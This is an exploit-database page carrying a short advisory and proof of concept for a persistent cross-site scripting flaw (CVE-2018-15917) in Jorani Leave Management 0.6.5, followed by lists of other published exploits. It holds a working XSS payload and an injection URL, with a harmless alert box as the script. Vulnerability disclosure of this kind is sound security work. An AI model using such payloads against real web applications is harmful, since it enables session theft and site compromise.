Menu

Search for hundreds of thousands of exploits

"Jorani Leave Management 0.6.5 - Cross-Site Scripting"

Author

Exploit author

"Javier Olmedo"

Platform

Exploit platform

php

Release date

Exploit published date

2018-09-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Exploit Title: Jorani Leave Management System 0.6.5 – Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-09-06
# Google Dork: N/A
# Vendor: Benjamin BALET
# Software Link: https://jorani.org/download.html
# Affected Version: 0.6.5 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-15917
  
# 1. Technical Description:
# Language parameter is vulnerable to Persistent Cross-Site Scripting (XSS) attacks through
# a GET request in which the values are stored in the user session.
  
# 2. Proof Of Concept (PoC):
# Go to http://localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue=
 
# 3. Payload:
# en"><script>alert('PoC CVE-2018-15917')</script>

# 6. Reference:
# https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/
# https://github.com/bbalet/jorani/issues/254
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-03-02 "Joplin Desktop 1.0.184 - Cross-Site Scripting" webapps multiple "Javier Olmedo"
2020-01-29 "XMLBlueprint 16.191112 - XML External Entity Injection" local windows "Javier Olmedo"
2020-01-20 "Easy XML Editor 1.7.8 - XML External Entity Injection" local xml "Javier Olmedo"
2019-08-26 "WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection" webapps php "Javier Olmedo"
2019-03-26 "Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting" webapps php "Javier Olmedo"
2018-12-19 "Integria IMS 5.0.83 - Cross-Site Request Forgery" webapps php "Javier Olmedo"
2018-12-19 "Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting" webapps php "Javier Olmedo"
2018-12-03 "PHP Server Monitor 3.3.1 - Cross-Site Request Forgery" webapps php "Javier Olmedo"
2018-11-26 "Ticketly 1.0 - 'kind_id' SQL Injection" webapps php "Javier Olmedo"
2018-11-21 "Ticketly 1.0 - 'name' SQL Injection" webapps php "Javier Olmedo"
2018-11-20 "Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)" webapps php "Javier Olmedo"
2018-09-06 "Jorani Leave Management 0.6.5 - Cross-Site Scripting" webapps php "Javier Olmedo"
2018-09-06 "Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection" webapps php "Javier Olmedo"
2018-08-27 "Sentrifugo HRMS 3.2 - 'deptid' SQL Injection" webapps windows "Javier Olmedo"
2018-08-16 "WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection" webapps php "Javier Olmedo"
2018-07-19 "WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting" webapps php "Javier Olmedo"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.